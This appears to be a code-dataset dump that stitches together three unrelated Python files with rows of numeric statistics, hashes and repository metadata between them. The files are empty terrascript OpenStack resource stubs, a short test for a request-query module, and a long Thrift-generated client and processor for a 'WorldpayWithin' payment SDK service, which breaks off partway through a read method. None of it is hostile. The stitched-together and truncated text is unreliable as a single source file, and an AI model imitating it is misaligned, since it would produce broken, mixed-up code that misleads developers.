class openstack_networking_subnet_v2(terrascript.Resource):
pass
class openstack_networking_subnet_route_v2(terrascript.Resource):
pass
class openstack_networking_subnetpool_v2(terrascript.Resource):
pass
class openstack_networking_addressscope_v2(terrascript.Resource):
pass
class openstack_networking_trunk_v2(terrascript.Resource):
pass
class openstack_objectstorage_container_v1(terrascript.Resource):
pass
class openstack_objectstorage_object_v1(terrascript.Resource):
pass
class openstack_objectstorage_tempurl_v1(terrascript.Resource):
pass
class openstack_vpnaas_ipsec_policy_v2(terrascript.Resource):
pass
class openstack_vpnaas_service_v2(terrascript.Resource):
pass
class openstack_vpnaas_ike_policy_v2(terrascript.Resource):
pass
class openstack_vpnaas_endpoint_group_v2(terrascript.Resource):
pass
class openstack_vpnaas_site_connection_v2(terrascript.Resource):
pass
class openstack_sharedfilesystem_securityservice_v2(terrascript.Resource):
pass
class openstack_sharedfilesystem_sharenetwork_v2(terrascript.Resource):
pass
class openstack_sharedfilesystem_share_v2(terrascript.Resource):
pass
class openstack_sharedfilesystem_share_access_v2(terrascript.Resource):
pass
class openstack_keymanager_secret_v1(terrascript.Resource):
pass
class openstack_keymanager_container_v1(terrascript.Resource):
pass
| 23.629032 | 79 | 0.832253 | 685 | 5,860 | 6.719708 | 0.131387 | 0.246361 | 0.404736 | 0.486639 | 0.893113 | 0.883771 | 0.788616 | 0.400608 | 0.036498 | 0 | 0 | 0.015946 | 0.111775 | 5,860 | 247 | 80 | 23.724696 | 0.868396 | 0.004437 | 0 | 0.496933 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.496933 | 0.006135 | 0 | 0.503067 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 9 |
796f4a10fe33b9be347540748a757fcdcc6934ff | 227 | py | Python | modules/tests/test_request.py | anamayagarodia/JARVIS-on-Messenger | d7198db0afe99cf3c0f7aacd5d5a16641deba809 | [
"MIT"
] | 6 | 2017-05-17T23:46:16.000Z | 2017-05-18T19:50:15.000Z | modules/tests/test_request.py | anamayagarodia/JARVIS-on-Messenger | d7198db0afe99cf3c0f7aacd5d5a16641deba809 | [
"MIT"
] | null | null | null | modules/tests/test_request.py | anamayagarodia/JARVIS-on-Messenger | d7198db0afe99cf3c0f7aacd5d5a16641deba809 | [
"MIT"
] | 2 | 2018-08-06T06:03:58.000Z | 2020-01-08T07:57:37.000Z | import modules
def test_request():
assert('request' == modules.process_query('request')[0])
assert('request' == modules.process_query('report')[0])
assert('request' != modules.process_query('something random')[0])
| 32.428571 | 69 | 0.696035 | 27 | 227 | 5.703704 | 0.444444 | 0.253247 | 0.38961 | 0.525974 | 0.636364 | 0.428571 | 0 | 0 | 0 | 0 | 0 | 0.015 | 0.118943 | 227 | 6 | 70 | 37.833333 | 0.755 | 0 | 0 | 0 | 0 | 0 | 0.220264 | 0 | 0 | 0 | 0 | 0 | 0.6 | 1 | 0.2 | true | 0 | 0.2 | 0 | 0.4 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
79842ef460ccfb4c054208c3205b1c157ab73ee2 | 106,561 | py | Python | wrappers/python_2-7/wpwithin/WPWithin.py | UpperLEFTY/worldpay-within-sdk | 5651b9b4be08faa83ba46735b2ce14d5fcbb515f | [
"MIT"
] | null | null | null | wrappers/python_2-7/wpwithin/WPWithin.py | UpperLEFTY/worldpay-within-sdk | 5651b9b4be08faa83ba46735b2ce14d5fcbb515f | [
"MIT"
] | null | null | null | wrappers/python_2-7/wpwithin/WPWithin.py | UpperLEFTY/worldpay-within-sdk | 5651b9b4be08faa83ba46735b2ce14d5fcbb515f | [
"MIT"
] | null | null | null | #
# Autogenerated by Thrift Compiler (0.10.0)
#
# DO NOT EDIT UNLESS YOU ARE SURE THAT YOU KNOW WHAT YOU ARE DOING
#
# options string: py
#
from thrift.Thrift import TType, TMessageType, TFrozenDict, TException, TApplicationException
from thrift.protocol.TProtocol import TProtocolException
import sys
import logging
from .ttypes import *
from thrift.Thrift import TProcessor
from thrift.transport import TTransport
class Iface(object):
"""
WorldpayWithin Service - exposing all WorldpayWithin SDK functionality
"""
def setup(self, name, description):
"""
Parameters:
- name
- description
"""
pass
def addService(self, svc):
"""
Parameters:
- svc
"""
pass
def removeService(self, svc):
"""
Parameters:
- svc
"""
pass
def initConsumer(self, scheme, hostname, port, urlPrefix, clientID, hceCard, pspConfig):
"""
Parameters:
- scheme
- hostname
- port
- urlPrefix
- clientID
- hceCard
- pspConfig
"""
pass
def initProducer(self, pspConfig):
"""
Parameters:
- pspConfig
"""
pass
def getDevice(self):
pass
def startServiceBroadcast(self, timeoutMillis):
"""
Parameters:
- timeoutMillis
"""
pass
def stopServiceBroadcast(self):
pass
def deviceDiscovery(self, timeoutMillis):
"""
Parameters:
- timeoutMillis
"""
pass
def requestServices(self):
pass
def getServicePrices(self, serviceId):
"""
Parameters:
- serviceId
"""
pass
def selectService(self, serviceId, numberOfUnits, priceId):
"""
Parameters:
- serviceId
- numberOfUnits
- priceId
"""
pass
def makePayment(self, request):
"""
Parameters:
- request
"""
pass
def beginServiceDelivery(self, serviceID, serviceDeliveryToken, unitsToSupply):
"""
Parameters:
- serviceID
- serviceDeliveryToken
- unitsToSupply
"""
pass
def endServiceDelivery(self, serviceID, serviceDeliveryToken, unitsReceived):
"""
Parameters:
- serviceID
- serviceDeliveryToken
- unitsReceived
"""
pass
class Client(Iface):
"""
WorldpayWithin Service - exposing all WorldpayWithin SDK functionality
"""
def __init__(self, iprot, oprot=None):
self._iprot = self._oprot = iprot
if oprot is not None:
self._oprot = oprot
self._seqid = 0
def setup(self, name, description):
"""
Parameters:
- name
- description
"""
self.send_setup(name, description)
self.recv_setup()
def send_setup(self, name, description):
self._oprot.writeMessageBegin('setup', TMessageType.CALL, self._seqid)
args = setup_args()
args.name = name
args.description = description
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_setup(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = setup_result()
result.read(iprot)
iprot.readMessageEnd()
if result.err is not None:
raise result.err
return
def addService(self, svc):
"""
Parameters:
- svc
"""
self.send_addService(svc)
self.recv_addService()
def send_addService(self, svc):
self._oprot.writeMessageBegin('addService', TMessageType.CALL, self._seqid)
args = addService_args()
args.svc = svc
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_addService(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = addService_result()
result.read(iprot)
iprot.readMessageEnd()
if result.err is not None:
raise result.err
return
def removeService(self, svc):
"""
Parameters:
- svc
"""
self.send_removeService(svc)
self.recv_removeService()
def send_removeService(self, svc):
self._oprot.writeMessageBegin('removeService', TMessageType.CALL, self._seqid)
args = removeService_args()
args.svc = svc
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_removeService(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = removeService_result()
result.read(iprot)
iprot.readMessageEnd()
if result.err is not None:
raise result.err
return
def initConsumer(self, scheme, hostname, port, urlPrefix, clientID, hceCard, pspConfig):
"""
Parameters:
- scheme
- hostname
- port
- urlPrefix
- clientID
- hceCard
- pspConfig
"""
self.send_initConsumer(scheme, hostname, port, urlPrefix, clientID, hceCard, pspConfig)
self.recv_initConsumer()
def send_initConsumer(self, scheme, hostname, port, urlPrefix, clientID, hceCard, pspConfig):
self._oprot.writeMessageBegin('initConsumer', TMessageType.CALL, self._seqid)
args = initConsumer_args()
args.scheme = scheme
args.hostname = hostname
args.port = port
args.urlPrefix = urlPrefix
args.clientID = clientID
args.hceCard = hceCard
args.pspConfig = pspConfig
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_initConsumer(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = initConsumer_result()
result.read(iprot)
iprot.readMessageEnd()
if result.err is not None:
raise result.err
return
def initProducer(self, pspConfig):
"""
Parameters:
- pspConfig
"""
self.send_initProducer(pspConfig)
self.recv_initProducer()
def send_initProducer(self, pspConfig):
self._oprot.writeMessageBegin('initProducer', TMessageType.CALL, self._seqid)
args = initProducer_args()
args.pspConfig = pspConfig
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_initProducer(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = initProducer_result()
result.read(iprot)
iprot.readMessageEnd()
if result.err is not None:
raise result.err
return
def getDevice(self):
self.send_getDevice()
return self.recv_getDevice()
def send_getDevice(self):
self._oprot.writeMessageBegin('getDevice', TMessageType.CALL, self._seqid)
args = getDevice_args()
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_getDevice(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = getDevice_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "getDevice failed: unknown result")
def startServiceBroadcast(self, timeoutMillis):
"""
Parameters:
- timeoutMillis
"""
self.send_startServiceBroadcast(timeoutMillis)
self.recv_startServiceBroadcast()
def send_startServiceBroadcast(self, timeoutMillis):
self._oprot.writeMessageBegin('startServiceBroadcast', TMessageType.CALL, self._seqid)
args = startServiceBroadcast_args()
args.timeoutMillis = timeoutMillis
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_startServiceBroadcast(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = startServiceBroadcast_result()
result.read(iprot)
iprot.readMessageEnd()
if result.err is not None:
raise result.err
return
def stopServiceBroadcast(self):
self.send_stopServiceBroadcast()
self.recv_stopServiceBroadcast()
def send_stopServiceBroadcast(self):
self._oprot.writeMessageBegin('stopServiceBroadcast', TMessageType.CALL, self._seqid)
args = stopServiceBroadcast_args()
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_stopServiceBroadcast(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = stopServiceBroadcast_result()
result.read(iprot)
iprot.readMessageEnd()
if result.err is not None:
raise result.err
return
def deviceDiscovery(self, timeoutMillis):
"""
Parameters:
- timeoutMillis
"""
self.send_deviceDiscovery(timeoutMillis)
return self.recv_deviceDiscovery()
def send_deviceDiscovery(self, timeoutMillis):
self._oprot.writeMessageBegin('deviceDiscovery', TMessageType.CALL, self._seqid)
args = deviceDiscovery_args()
args.timeoutMillis = timeoutMillis
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_deviceDiscovery(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = deviceDiscovery_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.err is not None:
raise result.err
raise TApplicationException(TApplicationException.MISSING_RESULT, "deviceDiscovery failed: unknown result")
def requestServices(self):
self.send_requestServices()
return self.recv_requestServices()
def send_requestServices(self):
self._oprot.writeMessageBegin('requestServices', TMessageType.CALL, self._seqid)
args = requestServices_args()
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_requestServices(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = requestServices_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.err is not None:
raise result.err
raise TApplicationException(TApplicationException.MISSING_RESULT, "requestServices failed: unknown result")
def getServicePrices(self, serviceId):
"""
Parameters:
- serviceId
"""
self.send_getServicePrices(serviceId)
return self.recv_getServicePrices()
def send_getServicePrices(self, serviceId):
self._oprot.writeMessageBegin('getServicePrices', TMessageType.CALL, self._seqid)
args = getServicePrices_args()
args.serviceId = serviceId
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_getServicePrices(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = getServicePrices_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.err is not None:
raise result.err
raise TApplicationException(TApplicationException.MISSING_RESULT, "getServicePrices failed: unknown result")
def selectService(self, serviceId, numberOfUnits, priceId):
"""
Parameters:
- serviceId
- numberOfUnits
- priceId
"""
self.send_selectService(serviceId, numberOfUnits, priceId)
return self.recv_selectService()
def send_selectService(self, serviceId, numberOfUnits, priceId):
self._oprot.writeMessageBegin('selectService', TMessageType.CALL, self._seqid)
args = selectService_args()
args.serviceId = serviceId
args.numberOfUnits = numberOfUnits
args.priceId = priceId
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_selectService(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = selectService_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.err is not None:
raise result.err
raise TApplicationException(TApplicationException.MISSING_RESULT, "selectService failed: unknown result")
def makePayment(self, request):
"""
Parameters:
- request
"""
self.send_makePayment(request)
return self.recv_makePayment()
def send_makePayment(self, request):
self._oprot.writeMessageBegin('makePayment', TMessageType.CALL, self._seqid)
args = makePayment_args()
args.request = request
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_makePayment(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = makePayment_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.err is not None:
raise result.err
raise TApplicationException(TApplicationException.MISSING_RESULT, "makePayment failed: unknown result")
def beginServiceDelivery(self, serviceID, serviceDeliveryToken, unitsToSupply):
"""
Parameters:
- serviceID
- serviceDeliveryToken
- unitsToSupply
"""
self.send_beginServiceDelivery(serviceID, serviceDeliveryToken, unitsToSupply)
return self.recv_beginServiceDelivery()
def send_beginServiceDelivery(self, serviceID, serviceDeliveryToken, unitsToSupply):
self._oprot.writeMessageBegin('beginServiceDelivery', TMessageType.CALL, self._seqid)
args = beginServiceDelivery_args()
args.serviceID = serviceID
args.serviceDeliveryToken = serviceDeliveryToken
args.unitsToSupply = unitsToSupply
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_beginServiceDelivery(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = beginServiceDelivery_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.err is not None:
raise result.err
raise TApplicationException(TApplicationException.MISSING_RESULT, "beginServiceDelivery failed: unknown result")
def endServiceDelivery(self, serviceID, serviceDeliveryToken, unitsReceived):
"""
Parameters:
- serviceID
- serviceDeliveryToken
- unitsReceived
"""
self.send_endServiceDelivery(serviceID, serviceDeliveryToken, unitsReceived)
return self.recv_endServiceDelivery()
def send_endServiceDelivery(self, serviceID, serviceDeliveryToken, unitsReceived):
self._oprot.writeMessageBegin('endServiceDelivery', TMessageType.CALL, self._seqid)
args = endServiceDelivery_args()
args.serviceID = serviceID
args.serviceDeliveryToken = serviceDeliveryToken
args.unitsReceived = unitsReceived
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_endServiceDelivery(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = endServiceDelivery_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
if result.err is not None:
raise result.err
raise TApplicationException(TApplicationException.MISSING_RESULT, "endServiceDelivery failed: unknown result")
class Processor(Iface, TProcessor):
def __init__(self, handler):
self._handler = handler
self._processMap = {}
self._processMap["setup"] = Processor.process_setup
self._processMap["addService"] = Processor.process_addService
self._processMap["removeService"] = Processor.process_removeService
self._processMap["initConsumer"] = Processor.process_initConsumer
self._processMap["initProducer"] = Processor.process_initProducer
self._processMap["getDevice"] = Processor.process_getDevice
self._processMap["startServiceBroadcast"] = Processor.process_startServiceBroadcast
self._processMap["stopServiceBroadcast"] = Processor.process_stopServiceBroadcast
self._processMap["deviceDiscovery"] = Processor.process_deviceDiscovery
self._processMap["requestServices"] = Processor.process_requestServices
self._processMap["getServicePrices"] = Processor.process_getServicePrices
self._processMap["selectService"] = Processor.process_selectService
self._processMap["makePayment"] = Processor.process_makePayment
self._processMap["beginServiceDelivery"] = Processor.process_beginServiceDelivery
self._processMap["endServiceDelivery"] = Processor.process_endServiceDelivery
def process(self, iprot, oprot):
(name, type, seqid) = iprot.readMessageBegin()
if name not in self._processMap:
iprot.skip(TType.STRUCT)
iprot.readMessageEnd()
x = TApplicationException(TApplicationException.UNKNOWN_METHOD, 'Unknown function %s' % (name))
oprot.writeMessageBegin(name, TMessageType.EXCEPTION, seqid)
x.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
return
else:
self._processMap[name](self, seqid, iprot, oprot)
return True
def process_setup(self, seqid, iprot, oprot):
args = setup_args()
args.read(iprot)
iprot.readMessageEnd()
result = setup_result()
try:
self._handler.setup(args.name, args.description)
msg_type = TMessageType.REPLY
except (TTransport.TTransportException, KeyboardInterrupt, SystemExit):
raise
except wpthrift_types.ttypes.Error as err:
msg_type = TMessageType.REPLY
result.err = err
except Exception as ex:
msg_type = TMessageType.EXCEPTION
logging.exception(ex)
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("setup", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_addService(self, seqid, iprot, oprot):
args = addService_args()
args.read(iprot)
iprot.readMessageEnd()
result = addService_result()
try:
self._handler.addService(args.svc)
msg_type = TMessageType.REPLY
except (TTransport.TTransportException, KeyboardInterrupt, SystemExit):
raise
except wpthrift_types.ttypes.Error as err:
msg_type = TMessageType.REPLY
result.err = err
except Exception as ex:
msg_type = TMessageType.EXCEPTION
logging.exception(ex)
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("addService", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_removeService(self, seqid, iprot, oprot):
args = removeService_args()
args.read(iprot)
iprot.readMessageEnd()
result = removeService_result()
try:
self._handler.removeService(args.svc)
msg_type = TMessageType.REPLY
except (TTransport.TTransportException, KeyboardInterrupt, SystemExit):
raise
except wpthrift_types.ttypes.Error as err:
msg_type = TMessageType.REPLY
result.err = err
except Exception as ex:
msg_type = TMessageType.EXCEPTION
logging.exception(ex)
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("removeService", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_initConsumer(self, seqid, iprot, oprot):
args = initConsumer_args()
args.read(iprot)
iprot.readMessageEnd()
result = initConsumer_result()
try:
self._handler.initConsumer(args.scheme, args.hostname, args.port, args.urlPrefix, args.clientID, args.hceCard, args.pspConfig)
msg_type = TMessageType.REPLY
except (TTransport.TTransportException, KeyboardInterrupt, SystemExit):
raise
except wpthrift_types.ttypes.Error as err:
msg_type = TMessageType.REPLY
result.err = err
except Exception as ex:
msg_type = TMessageType.EXCEPTION
logging.exception(ex)
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("initConsumer", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_initProducer(self, seqid, iprot, oprot):
args = initProducer_args()
args.read(iprot)
iprot.readMessageEnd()
result = initProducer_result()
try:
self._handler.initProducer(args.pspConfig)
msg_type = TMessageType.REPLY
except (TTransport.TTransportException, KeyboardInterrupt, SystemExit):
raise
except wpthrift_types.ttypes.Error as err:
msg_type = TMessageType.REPLY
result.err = err
except Exception as ex:
msg_type = TMessageType.EXCEPTION
logging.exception(ex)
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("initProducer", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_getDevice(self, seqid, iprot, oprot):
args = getDevice_args()
args.read(iprot)
iprot.readMessageEnd()
result = getDevice_result()
try:
result.success = self._handler.getDevice()
msg_type = TMessageType.REPLY
except (TTransport.TTransportException, KeyboardInterrupt, SystemExit):
raise
except Exception as ex:
msg_type = TMessageType.EXCEPTION
logging.exception(ex)
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("getDevice", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_startServiceBroadcast(self, seqid, iprot, oprot):
args = startServiceBroadcast_args()
args.read(iprot)
iprot.readMessageEnd()
result = startServiceBroadcast_result()
try:
self._handler.startServiceBroadcast(args.timeoutMillis)
msg_type = TMessageType.REPLY
except (TTransport.TTransportException, KeyboardInterrupt, SystemExit):
raise
except wpthrift_types.ttypes.Error as err:
msg_type = TMessageType.REPLY
result.err = err
except Exception as ex:
msg_type = TMessageType.EXCEPTION
logging.exception(ex)
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("startServiceBroadcast", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_stopServiceBroadcast(self, seqid, iprot, oprot):
args = stopServiceBroadcast_args()
args.read(iprot)
iprot.readMessageEnd()
result = stopServiceBroadcast_result()
try:
self._handler.stopServiceBroadcast()
msg_type = TMessageType.REPLY
except (TTransport.TTransportException, KeyboardInterrupt, SystemExit):
raise
except wpthrift_types.ttypes.Error as err:
msg_type = TMessageType.REPLY
result.err = err
except Exception as ex:
msg_type = TMessageType.EXCEPTION
logging.exception(ex)
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("stopServiceBroadcast", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_deviceDiscovery(self, seqid, iprot, oprot):
args = deviceDiscovery_args()
args.read(iprot)
iprot.readMessageEnd()
result = deviceDiscovery_result()
try:
result.success = self._handler.deviceDiscovery(args.timeoutMillis)
msg_type = TMessageType.REPLY
except (TTransport.TTransportException, KeyboardInterrupt, SystemExit):
raise
except wpthrift_types.ttypes.Error as err:
msg_type = TMessageType.REPLY
result.err = err
except Exception as ex:
msg_type = TMessageType.EXCEPTION
logging.exception(ex)
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("deviceDiscovery", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_requestServices(self, seqid, iprot, oprot):
args = requestServices_args()
args.read(iprot)
iprot.readMessageEnd()
result = requestServices_result()
try:
result.success = self._handler.requestServices()
msg_type = TMessageType.REPLY
except (TTransport.TTransportException, KeyboardInterrupt, SystemExit):
raise
except wpthrift_types.ttypes.Error as err:
msg_type = TMessageType.REPLY
result.err = err
except Exception as ex:
msg_type = TMessageType.EXCEPTION
logging.exception(ex)
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("requestServices", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_getServicePrices(self, seqid, iprot, oprot):
args = getServicePrices_args()
args.read(iprot)
iprot.readMessageEnd()
result = getServicePrices_result()
try:
result.success = self._handler.getServicePrices(args.serviceId)
msg_type = TMessageType.REPLY
except (TTransport.TTransportException, KeyboardInterrupt, SystemExit):
raise
except wpthrift_types.ttypes.Error as err:
msg_type = TMessageType.REPLY
result.err = err
except Exception as ex:
msg_type = TMessageType.EXCEPTION
logging.exception(ex)
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("getServicePrices", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_selectService(self, seqid, iprot, oprot):
args = selectService_args()
args.read(iprot)
iprot.readMessageEnd()
result = selectService_result()
try:
result.success = self._handler.selectService(args.serviceId, args.numberOfUnits, args.priceId)
msg_type = TMessageType.REPLY
except (TTransport.TTransportException, KeyboardInterrupt, SystemExit):
raise
except wpthrift_types.ttypes.Error as err:
msg_type = TMessageType.REPLY
result.err = err
except Exception as ex:
msg_type = TMessageType.EXCEPTION
logging.exception(ex)
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("selectService", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_makePayment(self, seqid, iprot, oprot):
args = makePayment_args()
args.read(iprot)
iprot.readMessageEnd()
result = makePayment_result()
try:
result.success = self._handler.makePayment(args.request)
msg_type = TMessageType.REPLY
except (TTransport.TTransportException, KeyboardInterrupt, SystemExit):
raise
except wpthrift_types.ttypes.Error as err:
msg_type = TMessageType.REPLY
result.err = err
except Exception as ex:
msg_type = TMessageType.EXCEPTION
logging.exception(ex)
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("makePayment", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_beginServiceDelivery(self, seqid, iprot, oprot):
args = beginServiceDelivery_args()
args.read(iprot)
iprot.readMessageEnd()
result = beginServiceDelivery_result()
try:
result.success = self._handler.beginServiceDelivery(args.serviceID, args.serviceDeliveryToken, args.unitsToSupply)
msg_type = TMessageType.REPLY
except (TTransport.TTransportException, KeyboardInterrupt, SystemExit):
raise
except wpthrift_types.ttypes.Error as err:
msg_type = TMessageType.REPLY
result.err = err
except Exception as ex:
msg_type = TMessageType.EXCEPTION
logging.exception(ex)
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("beginServiceDelivery", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_endServiceDelivery(self, seqid, iprot, oprot):
args = endServiceDelivery_args()
args.read(iprot)
iprot.readMessageEnd()
result = endServiceDelivery_result()
try:
result.success = self._handler.endServiceDelivery(args.serviceID, args.serviceDeliveryToken, args.unitsReceived)
msg_type = TMessageType.REPLY
except (TTransport.TTransportException, KeyboardInterrupt, SystemExit):
raise
except wpthrift_types.ttypes.Error as err:
msg_type = TMessageType.REPLY
result.err = err
except Exception as ex:
msg_type = TMessageType.EXCEPTION
logging.exception(ex)
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("endServiceDelivery", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
# HELPER FUNCTIONS AND STRUCTURES
class setup_args(object):
"""
Attributes:
- name
- description
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'name', 'UTF8', None, ), # 1
(2, TType.STRING, 'description', 'UTF8', None, ), # 2
)
def __init__(self, name=None, description=None,):
self.name = name
self.description = description
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.name = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.description = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
